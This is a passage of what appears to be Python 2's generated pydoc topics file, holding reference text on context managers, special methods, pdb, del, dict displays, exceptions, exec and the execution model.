'\n' 'For more information on context managers, see Context ' 'Manager Types.\n' '\n' 'object.__enter__(self)\n' '\n' ' Enter the runtime context related to this object. The ' '"with"\n' " statement will bind this method's return value to the " 'target(s)\n' ' specified in the "as" clause of the statement, if ' 'any.\n' '\n' 'object.__exit__(self, exc_type, exc_value, traceback)\n' '\n' ' Exit the runtime context related to this object. The ' 'parameters\n' ' describe the exception that caused the context to be ' 'exited. 
If the\n' ' context was exited without an exception, all three ' 'arguments will\n' ' be "None".\n' '\n' ' If an exception is supplied, and the method wishes to ' 'suppress the\n' ' exception (i.e., prevent it from being propagated), ' 'it should\n' ' return a true value. Otherwise, the exception will be ' 'processed\n' ' normally upon exit from this method.\n' '\n' ' Note that "__exit__()" methods should not reraise the ' 'passed-in\n' " exception; this is the caller's responsibility.\n" '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the ' 'Python "with"\n' ' statement.\n', 'continue': '\n' 'The "continue" statement\n' '************************\n' '\n' ' continue_stmt ::= "continue"\n' '\n' '"continue" may only occur syntactically nested in a "for" or ' '"while"\n' 'loop, but not nested in a function or class definition or ' '"finally"\n' 'clause within that loop. It continues with the next cycle of ' 'the\n' 'nearest enclosing loop.\n' '\n' 'When "continue" passes control out of a "try" statement with a\n' '"finally" clause, that "finally" clause is executed before ' 'really\n' 'starting the next loop cycle.\n', 'conversions': '\n' 'Arithmetic conversions\n' '**********************\n' '\n' 'When a description of an arithmetic operator below uses the ' 'phrase\n' '"the numeric arguments are converted to a common type," the ' 'arguments\n' 'are coerced using the coercion rules listed at Coercion ' 'rules. 
If\n' 'both arguments are standard numeric types, the following ' 'coercions are\n' 'applied:\n' '\n' '* If either argument is a complex number, the other is ' 'converted to\n' ' complex;\n' '\n' '* otherwise, if either argument is a floating point number, ' 'the\n' ' other is converted to floating point;\n' '\n' '* otherwise, if either argument is a long integer, the other ' 'is\n' ' converted to long integer;\n' '\n' '* otherwise, both must be plain integers and no conversion ' 'is\n' ' necessary.\n' '\n' 'Some additional rules apply for certain operators (e.g., a ' 'string left\n' "argument to the '%' operator). Extensions can define their " 'own\n' 'coercions.\n', 'customization': '\n' 'Basic customization\n' '*******************\n' '\n' 'object.__new__(cls[, ...])\n' '\n' ' Called to create a new instance of class *cls*. ' '"__new__()" is a\n' ' static method (special-cased so you need not declare it ' 'as such)\n' ' that takes the class of which an instance was requested ' 'as its\n' ' first argument. The remaining arguments are those ' 'passed to the\n' ' object constructor expression (the call to the class). 
' 'The return\n' ' value of "__new__()" should be the new object instance ' '(usually an\n' ' instance of *cls*).\n' '\n' ' Typical implementations create a new instance of the ' 'class by\n' ' invoking the superclass\'s "__new__()" method using\n' ' "super(currentclass, cls).__new__(cls[, ...])" with ' 'appropriate\n' ' arguments and then modifying the newly-created instance ' 'as\n' ' necessary before returning it.\n' '\n' ' If "__new__()" returns an instance of *cls*, then the ' 'new\n' ' instance\'s "__init__()" method will be invoked like\n' ' "__init__(self[, ...])", where *self* is the new ' 'instance and the\n' ' remaining arguments are the same as were passed to ' '"__new__()".\n' '\n' ' If "__new__()" does not return an instance of *cls*, ' 'then the new\n' ' instance\'s "__init__()" method will not be invoked.\n' '\n' ' "__new__()" is intended mainly to allow subclasses of ' 'immutable\n' ' types (like int, str, or tuple) to customize instance ' 'creation. It\n' ' is also commonly overridden in custom metaclasses in ' 'order to\n' ' customize class creation.\n' '\n' 'object.__init__(self[, ...])\n' '\n' ' Called after the instance has been created (by ' '"__new__()"), but\n' ' before it is returned to the caller. The arguments are ' 'those\n' ' passed to the class constructor expression. If a base ' 'class has an\n' ' "__init__()" method, the derived class\'s "__init__()" ' 'method, if\n' ' any, must explicitly call it to ensure proper ' 'initialization of the\n' ' base class part of the instance; for example:\n' ' "BaseClass.__init__(self, [args...])".\n' '\n' ' Because "__new__()" and "__init__()" work together in ' 'constructing\n' ' objects ("__new__()" to create it, and "__init__()" to ' 'customise\n' ' it), no non-"None" value may be returned by ' '"__init__()"; doing so\n' ' will cause a "TypeError" to be raised at runtime.\n' '\n' 'object.__del__(self)\n' '\n' ' Called when the instance is about to be destroyed. 
This ' 'is also\n' ' called a destructor. If a base class has a "__del__()" ' 'method, the\n' ' derived class\'s "__del__()" method, if any, must ' 'explicitly call it\n' ' to ensure proper deletion of the base class part of the ' 'instance.\n' ' Note that it is possible (though not recommended!) for ' 'the\n' ' "__del__()" method to postpone destruction of the ' 'instance by\n' ' creating a new reference to it. It may then be called ' 'at a later\n' ' time when this new reference is deleted. It is not ' 'guaranteed that\n' ' "__del__()" methods are called for objects that still ' 'exist when\n' ' the interpreter exits.\n' '\n' ' Note: "del x" doesn\'t directly call "x.__del__()" --- ' 'the former\n' ' decrements the reference count for "x" by one, and the ' 'latter is\n' ' only called when "x"\'s reference count reaches zero. ' 'Some common\n' ' situations that may prevent the reference count of an ' 'object from\n' ' going to zero include: circular references between ' 'objects (e.g.,\n' ' a doubly-linked list or a tree data structure with ' 'parent and\n' ' child pointers); a reference to the object on the ' 'stack frame of\n' ' a function that caught an exception (the traceback ' 'stored in\n' ' "sys.exc_traceback" keeps the stack frame alive); or a ' 'reference\n' ' to the object on the stack frame that raised an ' 'unhandled\n' ' exception in interactive mode (the traceback stored ' 'in\n' ' "sys.last_traceback" keeps the stack frame alive). ' 'The first\n' ' situation can only be remedied by explicitly breaking ' 'the cycles;\n' ' the latter two situations can be resolved by storing ' '"None" in\n' ' "sys.exc_traceback" or "sys.last_traceback". Circular ' 'references\n' ' which are garbage are detected when the option cycle ' 'detector is\n' " enabled (it's on by default), but can only be cleaned " 'up if there\n' ' are no Python-level "__del__()" methods involved. 
' 'Refer to the\n' ' documentation for the "gc" module for more information ' 'about how\n' ' "__del__()" methods are handled by the cycle ' 'detector,\n' ' particularly the description of the "garbage" value.\n' '\n' ' Warning: Due to the precarious circumstances under ' 'which\n' ' "__del__()" methods are invoked, exceptions that occur ' 'during\n' ' their execution are ignored, and a warning is printed ' 'to\n' ' "sys.stderr" instead. Also, when "__del__()" is ' 'invoked in\n' ' response to a module being deleted (e.g., when ' 'execution of the\n' ' program is done), other globals referenced by the ' '"__del__()"\n' ' method may already have been deleted or in the process ' 'of being\n' ' torn down (e.g. the import machinery shutting down). ' 'For this\n' ' reason, "__del__()" methods should do the absolute ' 'minimum needed\n' ' to maintain external invariants. Starting with ' 'version 1.5,\n' ' Python guarantees that globals whose name begins with ' 'a single\n' ' underscore are deleted from their module before other ' 'globals are\n' ' deleted; if no other references to such globals exist, ' 'this may\n' ' help in assuring that imported modules are still ' 'available at the\n' ' time when the "__del__()" method is called.\n' '\n' ' See also the "-R" command-line option.\n' '\n' 'object.__repr__(self)\n' '\n' ' Called by the "repr()" built-in function and by string ' 'conversions\n' ' (reverse quotes) to compute the "official" string ' 'representation of\n' ' an object. If at all possible, this should look like a ' 'valid\n' ' Python expression that could be used to recreate an ' 'object with the\n' ' same value (given an appropriate environment). If this ' 'is not\n' ' possible, a string of the form "<...some useful ' 'description...>"\n' ' should be returned. The return value must be a string ' 'object. 
If a\n' ' class defines "__repr__()" but not "__str__()", then ' '"__repr__()"\n' ' is also used when an "informal" string representation of ' 'instances\n' ' of that class is required.\n' '\n' ' This is typically used for debugging, so it is important ' 'that the\n' ' representation is information-rich and unambiguous.\n' '\n' 'object.__str__(self)\n' '\n' ' Called by the "str()" built-in function and by the ' '"print"\n' ' statement to compute the "informal" string ' 'representation of an\n' ' object. This differs from "__repr__()" in that it does ' 'not have to\n' ' be a valid Python expression: a more convenient or ' 'concise\n' ' representation may be used instead. The return value ' 'must be a\n' ' string object.\n' '\n' 'object.__lt__(self, other)\n' 'object.__le__(self, other)\n' 'object.__eq__(self, other)\n' 'object.__ne__(self, other)\n' 'object.__gt__(self, other)\n' 'object.__ge__(self, other)\n' '\n' ' New in version 2.1.\n' '\n' ' These are the so-called "rich comparison" methods, and ' 'are called\n' ' for comparison operators in preference to "__cmp__()" ' 'below. The\n' ' correspondence between operator symbols and method names ' 'is as\n' ' follows: "x<y" calls "x.__lt__(y)", "x<=y" calls ' '"x.__le__(y)",\n' ' "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call ' '"x.__ne__(y)",\n' ' "x>y" calls "x.__gt__(y)", and "x>=y" calls ' '"x.__ge__(y)".\n' '\n' ' A rich comparison method may return the singleton ' '"NotImplemented"\n' ' if it does not implement the operation for a given pair ' 'of\n' ' arguments. By convention, "False" and "True" are ' 'returned for a\n' ' successful comparison. 
However, these methods can return ' 'any value,\n' ' so if the comparison operator is used in a Boolean ' 'context (e.g.,\n' ' in the condition of an "if" statement), Python will call ' '"bool()"\n' ' on the value to determine if the result is true or ' 'false.\n' '\n' ' There are no implied relationships among the comparison ' 'operators.\n' ' The truth of "x==y" does not imply that "x!=y" is ' 'false.\n' ' Accordingly, when defining "__eq__()", one should also ' 'define\n' ' "__ne__()" so that the operators will behave as ' 'expected. See the\n' ' paragraph on "__hash__()" for some important notes on ' 'creating\n' ' *hashable* objects which support custom comparison ' 'operations and\n' ' are usable as dictionary keys.\n' '\n' ' There are no swapped-argument versions of these methods ' '(to be used\n' ' when the left argument does not support the operation ' 'but the right\n' ' argument does); rather, "__lt__()" and "__gt__()" are ' "each other's\n" ' reflection, "__le__()" and "__ge__()" are each other\'s ' 'reflection,\n' ' and "__eq__()" and "__ne__()" are their own reflection.\n' '\n' ' Arguments to rich comparison methods are never coerced.\n' '\n' ' To automatically generate ordering operations from a ' 'single root\n' ' operation, see "functools.total_ordering()".\n' '\n' 'object.__cmp__(self, other)\n' '\n' ' Called by comparison operations if rich comparison (see ' 'above) is\n' ' not defined. Should return a negative integer if "self ' '< other",\n' ' zero if "self == other", a positive integer if "self > ' 'other". If\n' ' no "__cmp__()", "__eq__()" or "__ne__()" operation is ' 'defined,\n' ' class instances are compared by object identity ' '("address"). See\n' ' also the description of "__hash__()" for some important ' 'notes on\n' ' creating *hashable* objects which support custom ' 'comparison\n' ' operations and are usable as dictionary keys. 
(Note: ' 'the\n' ' restriction that exceptions are not propagated by ' '"__cmp__()" has\n' ' been removed since Python 1.5.)\n' '\n' 'object.__rcmp__(self, other)\n' '\n' ' Changed in version 2.1: No longer supported.\n' '\n' 'object.__hash__(self)\n' '\n' ' Called by built-in function "hash()" and for operations ' 'on members\n' ' of hashed collections including "set", "frozenset", and ' '"dict".\n' ' "__hash__()" should return an integer. The only ' 'required property\n' ' is that objects which compare equal have the same hash ' 'value; it is\n' ' advised to somehow mix together (e.g. using exclusive ' 'or) the hash\n' ' values for the components of the object that also play a ' 'part in\n' ' comparison of objects.\n' '\n' ' If a class does not define a "__cmp__()" or "__eq__()" ' 'method it\n' ' should not define a "__hash__()" operation either; if it ' 'defines\n' ' "__cmp__()" or "__eq__()" but not "__hash__()", its ' 'instances will\n' ' not be usable in hashed collections. If a class defines ' 'mutable\n' ' objects and implements a "__cmp__()" or "__eq__()" ' 'method, it\n' ' should not implement "__hash__()", since hashable ' 'collection\n' " implementations require that a object's hash value is " 'immutable (if\n' " the object's hash value changes, it will be in the wrong " 'hash\n' ' bucket).\n' '\n' ' User-defined classes have "__cmp__()" and "__hash__()" ' 'methods by\n' ' default; with them, all objects compare unequal (except ' 'with\n' ' themselves) and "x.__hash__()" returns a result derived ' 'from\n' ' "id(x)".\n' '\n' ' Classes which inherit a "__hash__()" method from a ' 'parent class but\n' ' change the meaning of "__cmp__()" or "__eq__()" such ' 'that the hash\n' ' value returned is no longer appropriate (e.g. by ' 'switching to a\n' ' value-based concept of equality instead of the default ' 'identity\n' ' based equality) can explicitly flag themselves as being ' 'unhashable\n' ' by setting "__hash__ = None" in the class definition. 
' 'Doing so\n' ' means that not only will instances of the class raise ' 'an\n' ' appropriate "TypeError" when a program attempts to ' 'retrieve their\n' ' hash value, but they will also be correctly identified ' 'as\n' ' unhashable when checking "isinstance(obj, ' 'collections.Hashable)"\n' ' (unlike classes which define their own "__hash__()" to ' 'explicitly\n' ' raise "TypeError").\n' '\n' ' Changed in version 2.5: "__hash__()" may now also return ' 'a long\n' ' integer object; the 32-bit integer is then derived from ' 'the hash of\n' ' that object.\n' '\n' ' Changed in version 2.6: "__hash__" may now be set to ' '"None" to\n' ' explicitly flag instances of a class as unhashable.\n' '\n' 'object.__nonzero__(self)\n' '\n' ' Called to implement truth value testing and the built-in ' 'operation\n' ' "bool()"; should return "False" or "True", or their ' 'integer\n' ' equivalents "0" or "1". When this method is not ' 'defined,\n' ' "__len__()" is called, if it is defined, and the object ' 'is\n' ' considered true if its result is nonzero. If a class ' 'defines\n' ' neither "__len__()" nor "__nonzero__()", all its ' 'instances are\n' ' considered true.\n' '\n' 'object.__unicode__(self)\n' '\n' ' Called to implement "unicode()" built-in; should return ' 'a Unicode\n' ' object. When this method is not defined, string ' 'conversion is\n' ' attempted, and the result of string conversion is ' 'converted to\n' ' Unicode using the system default encoding.\n', 'debugger': '\n' '"pdb" --- The Python Debugger\n' '*****************************\n' '\n' '**Source code:** Lib/pdb.py\n' '\n' '======================================================================\n' '\n' 'The module "pdb" defines an interactive source code debugger ' 'for\n' 'Python programs. 
It supports setting (conditional) breakpoints ' 'and\n' 'single stepping at the source line level, inspection of stack ' 'frames,\n' 'source code listing, and evaluation of arbitrary Python code in ' 'the\n' 'context of any stack frame. It also supports post-mortem ' 'debugging\n' 'and can be called under program control.\n' '\n' 'The debugger is extensible --- it is actually defined as the ' 'class\n' '"Pdb". This is currently undocumented but easily understood by ' 'reading\n' 'the source. The extension interface uses the modules "bdb" and ' '"cmd".\n' '\n' 'The debugger\'s prompt is "(Pdb)". Typical usage to run a ' 'program under\n' 'control of the debugger is:\n' '\n' ' >>> import pdb\n' ' >>> import mymodule\n' " >>> pdb.run('mymodule.test()')\n" ' > <string>(0)?()\n' ' (Pdb) continue\n' ' > <string>(1)?()\n' ' (Pdb) continue\n' " NameError: 'spam'\n" ' > <string>(1)?()\n' ' (Pdb)\n' '\n' '"pdb.py" can also be invoked as a script to debug other ' 'scripts. For\n' 'example:\n' '\n' ' python -m pdb myscript.py\n' '\n' 'When invoked as a script, pdb will automatically enter ' 'post-mortem\n' 'debugging if the program being debugged exits abnormally. After ' 'post-\n' 'mortem debugging (or after normal exit of the program), pdb ' 'will\n' "restart the program. Automatic restarting preserves pdb's state " '(such\n' 'as breakpoints) and in most cases is more useful than quitting ' 'the\n' "debugger upon program's exit.\n" '\n' 'New in version 2.4: Restarting post-mortem behavior added.\n' '\n' 'The typical usage to break into the debugger from a running ' 'program is\n' 'to insert\n' '\n' ' import pdb; pdb.set_trace()\n' '\n' 'at the location you want to break into the debugger. 
You can ' 'then\n' 'step through the code following this statement, and continue ' 'running\n' 'without the debugger using the "c" command.\n' '\n' 'The typical usage to inspect a crashed program is:\n' '\n' ' >>> import pdb\n' ' >>> import mymodule\n' ' >>> mymodule.test()\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in ?\n' ' File "./mymodule.py", line 4, in test\n' ' test2()\n' ' File "./mymodule.py", line 3, in test2\n' ' print spam\n' ' NameError: spam\n' ' >>> pdb.pm()\n' ' > ./mymodule.py(3)test2()\n' ' -> print spam\n' ' (Pdb)\n' '\n' 'The module defines the following functions; each enters the ' 'debugger\n' 'in a slightly different way:\n' '\n' 'pdb.run(statement[, globals[, locals]])\n' '\n' ' Execute the *statement* (given as a string) under debugger ' 'control.\n' ' The debugger prompt appears before any code is executed; you ' 'can\n' ' set breakpoints and type "continue", or you can step through ' 'the\n' ' statement using "step" or "next" (all these commands are ' 'explained\n' ' below). The optional *globals* and *locals* arguments ' 'specify the\n' ' environment in which the code is executed; by default the\n' ' dictionary of the module "__main__" is used. (See the ' 'explanation\n' ' of the "exec" statement or the "eval()" built-in function.)\n' '\n' 'pdb.runeval(expression[, globals[, locals]])\n' '\n' ' Evaluate the *expression* (given as a string) under debugger\n' ' control. When "runeval()" returns, it returns the value of ' 'the\n' ' expression. Otherwise this function is similar to "run()".\n' '\n' 'pdb.runcall(function[, argument, ...])\n' '\n' ' Call the *function* (a function or method object, not a ' 'string)\n' ' with the given arguments. When "runcall()" returns, it ' 'returns\n' ' whatever the function call returned. The debugger prompt ' 'appears\n' ' as soon as the function is entered.\n' '\n' 'pdb.set_trace()\n' '\n' ' Enter the debugger at the calling stack frame. 
This is ' 'useful to\n' ' hard-code a breakpoint at a given point in a program, even if ' 'the\n' ' code is not otherwise being debugged (e.g. when an assertion\n' ' fails).\n' '\n' 'pdb.post_mortem([traceback])\n' '\n' ' Enter post-mortem debugging of the given *traceback* object. ' 'If no\n' ' *traceback* is given, it uses the one of the exception that ' 'is\n' ' currently being handled (an exception must be being handled ' 'if the\n' ' default is to be used).\n' '\n' 'pdb.pm()\n' '\n' ' Enter post-mortem debugging of the traceback found in\n' ' "sys.last_traceback".\n' '\n' 'The "run*" functions and "set_trace()" are aliases for ' 'instantiating\n' 'the "Pdb" class and calling the method of the same name. If you ' 'want\n' 'to access further features, you have to do this yourself:\n' '\n' "class pdb.Pdb(completekey='tab', stdin=None, stdout=None, " 'skip=None)\n' '\n' ' "Pdb" is the debugger class.\n' '\n' ' The *completekey*, *stdin* and *stdout* arguments are passed ' 'to the\n' ' underlying "cmd.Cmd" class; see the description there.\n' '\n' ' The *skip* argument, if given, must be an iterable of ' 'glob-style\n' ' module name patterns. The debugger will not step into frames ' 'that\n' ' originate in a module that matches one of these patterns. ' '[1]\n' '\n' ' Example call to enable tracing with *skip*:\n' '\n' " import pdb; pdb.Pdb(skip=['django.*']).set_trace()\n" '\n' ' New in version 2.7: The *skip* argument.\n' '\n' ' run(statement[, globals[, locals]])\n' ' runeval(expression[, globals[, locals]])\n' ' runcall(function[, argument, ...])\n' ' set_trace()\n' '\n' ' See the documentation for the functions explained above.\n', 'del': '\n' 'The "del" statement\n' '*******************\n' '\n' ' del_stmt ::= "del" target_list\n' '\n' 'Deletion is recursively defined very similar to the way assignment ' 'is\n' 'defined. 
Rather than spelling it out in full details, here are some\n' 'hints.\n' '\n' 'Deletion of a target list recursively deletes each target, from left\n' 'to right.\n' '\n' 'Deletion of a name removes the binding of that name from the local ' 'or\n' 'global namespace, depending on whether the name occurs in a "global"\n' 'statement in the same code block. If the name is unbound, a\n' '"NameError" exception will be raised.\n' '\n' 'It is illegal to delete a name from the local namespace if it occurs\n' 'as a free variable in a nested block.\n' '\n' 'Deletion of attribute references, subscriptions and slicings is ' 'passed\n' 'to the primary object involved; deletion of a slicing is in general\n' 'equivalent to assignment of an empty slice of the right type (but ' 'even\n' 'this is determined by the sliced object).\n', 'dict': '\n' 'Dictionary displays\n' '*******************\n' '\n' 'A dictionary display is a possibly empty series of key/datum pairs\n' 'enclosed in curly braces:\n' '\n' ' dict_display ::= "{" [key_datum_list | dict_comprehension] ' '"}"\n' ' key_datum_list ::= key_datum ("," key_datum)* [","]\n' ' key_datum ::= expression ":" expression\n' ' dict_comprehension ::= expression ":" expression comp_for\n' '\n' 'A dictionary display yields a new dictionary object.\n' '\n' 'If a comma-separated sequence of key/datum pairs is given, they are\n' 'evaluated from left to right to define the entries of the ' 'dictionary:\n' 'each key object is used as a key into the dictionary to store the\n' 'corresponding datum. This means that you can specify the same key\n' "multiple times in the key/datum list, and the final dictionary's " 'value\n' 'for that key will be the last one given.\n' '\n' 'A dict comprehension, in contrast to list and set comprehensions,\n' 'needs two expressions separated with a colon followed by the usual\n' '"for" and "if" clauses. 
When the comprehension is run, the ' 'resulting\n' 'key and value elements are inserted in the new dictionary in the ' 'order\n' 'they are produced.\n' '\n' 'Restrictions on the types of the key values are listed earlier in\n' 'section The standard type hierarchy. (To summarize, the key type\n' 'should be *hashable*, which excludes all mutable objects.) Clashes\n' 'between duplicate keys are not detected; the last datum (textually\n' 'rightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': '\n' 'Interaction with dynamic features\n' '*********************************\n' '\n' 'There are several cases where Python statements are ' 'illegal when used\n' 'in conjunction with nested scopes that contain free ' 'variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is ' 'illegal to\n' 'delete the name. An error will be reported at compile ' 'time.\n' '\n' 'If the wild card form of import --- "import *" --- is ' 'used in a\n' 'function and the function contains or is a nested block ' 'with free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function ' 'contains or is a\n' 'nested block with free variables, the compiler will ' 'raise a\n' '"SyntaxError" unless the exec explicitly specifies the ' 'local namespace\n' 'for the "exec". (In other words, "exec obj" would be ' 'illegal, but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and ' 'the "exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global ' 'namespaces of\n' 'the caller. Free variables are not resolved in the ' 'nearest enclosing\n' 'namespace, but in the global namespace. [1] The "exec" ' 'statement and\n' 'the "eval()" and "execfile()" functions have optional ' 'arguments to\n' 'override the global and local namespace. 
If only one ' 'namespace is\n' 'specified, it is used for both.\n', 'else': '\n' 'The "if" statement\n' '******************\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the expressions ' 'one\n' 'by one until one is found to be true (see section Boolean ' 'operations\n' 'for the definition of true and false); then that suite is executed\n' '(and no other part of the "if" statement is executed or evaluated).\n' 'If all expressions are false, the suite of the "else" clause, if\n' 'present, is executed.\n', 'exceptions': '\n' 'Exceptions\n' '**********\n' '\n' 'Exceptions are a means of breaking out of the normal flow of ' 'control\n' 'of a code block in order to handle errors or other ' 'exceptional\n' 'conditions. An exception is *raised* at the point where the ' 'error is\n' 'detected; it may be *handled* by the surrounding code block or ' 'by any\n' 'code block that directly or indirectly invoked the code block ' 'where\n' 'the error occurred.\n' '\n' 'The Python interpreter raises an exception when it detects a ' 'run-time\n' 'error (such as division by zero). A Python program can also\n' 'explicitly raise an exception with the "raise" statement. ' 'Exception\n' 'handlers are specified with the "try" ... "except" statement. 
' 'The\n' '"finally" clause of such a statement can be used to specify ' 'cleanup\n' 'code which does not handle the exception, but is executed ' 'whether an\n' 'exception occurred or not in the preceding code.\n' '\n' 'Python uses the "termination" model of error handling: an ' 'exception\n' 'handler can find out what happened and continue execution at ' 'an outer\n' 'level, but it cannot repair the cause of the error and retry ' 'the\n' 'failing operation (except by re-entering the offending piece ' 'of code\n' 'from the top).\n' '\n' 'When an exception is not handled at all, the interpreter ' 'terminates\n' 'execution of the program, or returns to its interactive main ' 'loop. In\n' 'either case, it prints a stack backtrace, except when the ' 'exception is\n' '"SystemExit".\n' '\n' 'Exceptions are identified by class instances. The "except" ' 'clause is\n' 'selected depending on the class of the instance: it must ' 'reference the\n' 'class of the instance or a base class thereof. The instance ' 'can be\n' 'received by the handler and can carry additional information ' 'about the\n' 'exceptional condition.\n' '\n' 'Exceptions can also be identified by strings, in which case ' 'the\n' '"except" clause is selected by object identity. An arbitrary ' 'value\n' 'can be raised along with the identifying string which can be ' 'passed to\n' 'the handler.\n' '\n' 'Note: Messages to exceptions are not part of the Python API. 
' 'Their\n' ' contents may change from one version of Python to the next ' 'without\n' ' warning and should not be relied on by code which will run ' 'under\n' ' multiple versions of the interpreter.\n' '\n' 'See also the description of the "try" statement in section The ' 'try\n' 'statement and "raise" statement in section The raise ' 'statement.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] This limitation occurs because the code that is executed ' 'by\n' ' these operations is not available at the time the module ' 'is\n' ' compiled.\n', 'exec': '\n' 'The "exec" statement\n' '********************\n' '\n' ' exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n' '\n' 'This statement supports dynamic execution of Python code. The ' 'first\n' 'expression should evaluate to either a Unicode string, a *Latin-1*\n' 'encoded string, an open file object, a code object, or a tuple. If ' 'it\n' 'is a string, the string is parsed as a suite of Python statements\n' 'which is then executed (unless a syntax error occurs). [1] If it is ' 'an\n' 'open file, the file is parsed until EOF and executed. If it is a ' 'code\n' 'object, it is simply executed. For the interpretation of a tuple, ' 'see\n' "below. In all cases, the code that's executed is expected to be " 'valid\n' 'as file input (see section File input). Be aware that the "return"\n' 'and "yield" statements may not be used outside of function ' 'definitions\n' 'even within the context of code passed to the "exec" statement.\n' '\n' 'In all cases, if the optional parts are omitted, the code is ' 'executed\n' 'in the current scope. If only the first expression after "in" is\n' 'specified, it should be a dictionary, which will be used for both ' 'the\n' 'global and the local variables. If two expressions are given, they\n' 'are used for the global and local variables, respectively. If\n' 'provided, *locals* can be any mapping object. Remember that at ' 'module\n' 'level, globals and locals are the same dictionary. 
If two separate\n' 'objects are given as *globals* and *locals*, the code will be ' 'executed\n' 'as if it were embedded in a class definition.\n' '\n' 'The first expression may also be a tuple of length 2 or 3. In this\n' 'case, the optional parts must be omitted. The form "exec(expr,\n' 'globals)" is equivalent to "exec expr in globals", while the form\n' '"exec(expr, globals, locals)" is equivalent to "exec expr in ' 'globals,\n' 'locals". The tuple form of "exec" provides compatibility with ' 'Python\n' '3, where "exec" is a function rather than a statement.\n' '\n' 'Changed in version 2.4: Formerly, *locals* was required to be a\n' 'dictionary.\n' '\n' 'As a side effect, an implementation may insert additional keys into\n' 'the dictionaries given besides those corresponding to variable ' 'names\n' 'set by the executed code. For example, the current implementation ' 'may\n' 'add a reference to the dictionary of the built-in module ' '"__builtin__"\n' 'under the key "__builtins__" (!).\n' '\n' "**Programmer's hints:** dynamic evaluation of expressions is " 'supported\n' 'by the built-in function "eval()". The built-in functions ' '"globals()"\n' 'and "locals()" return the current global and local dictionary,\n' 'respectively, which may be useful to pass around for use by "exec".\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] Note that the parser only accepts the Unix-style end of line\n' ' convention. If you are reading the code from a file, make sure ' 'to\n' ' use *universal newlines* mode to convert Windows or Mac-style\n' ' newlines.\n', 'execmodel': '\n' 'Execution model\n' '***************\n' '\n' '\n' 'Naming and binding\n' '==================\n' '\n' '*Names* refer to objects. Names are introduced by name ' 'binding\n' 'operations. 
Each occurrence of a name in the program text ' 'refers to\n' 'the *binding* of that name established in the innermost ' 'function block\n' 'containing the use.\n' '\n' 'A *block* is a piece of Python program text that is executed as ' 'a\n' 'unit. The following are blocks: a module, a function body, and ' 'a class\n' 'definition. Each command typed interactively is a block. A ' 'script\n' 'file (a file given as standard input to the interpreter or ' 'specified\n' 'on the interpreter command line the first argument) is a code ' 'block.\n' 'A script command (a command specified on the interpreter ' 'command line\n' "with the '**-c**' option) is a code block. The file read by " 'the\n' 'built-in function "execfile()" is a code block. The string ' 'argument\n' 'passed to the built-in function "eval()" and to the "exec" ' 'statement\n' 'is a code block. The expression read and evaluated by the ' 'built-in\n' 'function "input()" is a code block.\n' '\n' 'A code block is executed in an *execution frame*. A frame ' 'contains\n' 'some administrative information (used for debugging) and ' 'determines\n' "where and how execution continues after the code block's " 'execution has\n' 'completed.\n' '\n' 'A *scope* defines the visibility of a name within a block. If ' 'a local\n' 'variable is defined in a block, its scope includes that block. ' 'If the\n' 'definition occurs in a function block, the scope extends to any ' 'blocks\n' 'contained within the defining one, unless a contained block ' 'introduces\n' 'a different binding for the name. The scope of names defined ' 'in a\n' 'class block is limited to the class block; it does not extend ' 'to the\n' 'code blocks of methods -- this includes generator expressions ' 'since\n' 'they are implemented using a function scope. 
This means that ' 'the\n' 'following will fail:\n' '\n' ' class A:\n' ' a = 42\n' ' b = list(a + i for i in range(10))\n' '\n' 'When a name is used in a code block, it is resolved using the ' 'nearest\n' 'enclosing scope. The set of all such scopes visible to a code ' 'block\n' "is called the block's *environment*.\n" '\n' 'If a name is bound in a block, it is a local variable of that ' 'block.\n' 'If a name is bound at the module level, it is a global ' 'variable. (The\n' 'variables of the module code block are local and global.) If ' 'a\n' 'variable is used in a code block but not defined there, it is a ' '*free\n' 'variable*.\n' '\n' 'When a name is not found at all, a "NameError" exception is ' 'raised.\n' 'If the name refers to a local variable that has not been bound, ' 'a\n' '"UnboundLocalError" exception is raised. "UnboundLocalError" ' 'is a\n' 'subclass of "NameError".\n' '\n' 'The following constructs bind names: formal parameters to ' 'functions,\n' '"import" statements, class and function definitions (these bind ' 'the\n' 'class or function name in the defining block), and targets that ' 'are\n' 'identifiers if occurring in an assignment, "for" loop header, ' 'in the\n' 'second position of an "except" clause header or after "as" in a ' '"with"\n' 'statement. The "import" statement of the form "from ... import ' '*"\n' 'binds all names defined in the imported module, except those ' 'beginning\n' 'with an underscore. This form may only be used at the module ' 'level.\n' '\n' 'A target occurring in a "del" statement is also considered ' 'bound for\n' 'this purpose (though the actual semantics are to unbind the ' 'name). 
It\n' 'is illegal to unbind a name that is referenced by an enclosing ' 'scope;\n' 'the compiler will report a "SyntaxError".\n' '\n' 'Each assignment or import statement occurs within a block ' 'defined by a\n' 'class or function definition or at the module level (the ' 'top-level\n' 'code block).\n' '\n' 'If a name binding operation occurs anywhere within a code ' 'block, all\n' 'uses of the name within the block are treated as references to ' 'the\n' 'current block. This can lead to errors when a name is used ' 'within a\n' 'block before it is bound. This rule is subtle. Python lacks\n' 'declarations and allows name binding operations to occur ' 'anywhere\n' 'within a code block. The local variables of a code block can ' 'be\n' 'determined by scanning the entire text of the block for name ' 'binding\n' 'operations.\n' '\n' 'If the global statement occurs within a block, all uses of the ' 'name\n' 'specified in the statement refer to the binding of that name in ' 'the\n' 'top-level namespace. Names are resolved in the top-level ' 'namespace by\n' 'searching the global namespace, i.e. the namespace of the ' 'module\n' 'containing the code block, and the builtins namespace, the ' 'namespace\n' 'of the module "__builtin__". The global namespace is searched ' 'first.\n' 'If the name is not found there, the builtins namespace is ' 'searched.\n' 'The global statement must precede all uses of the name.\n' '\n' 'The builtins namespace associated with the execution of a code ' 'block\n' 'is actually found by looking up the name 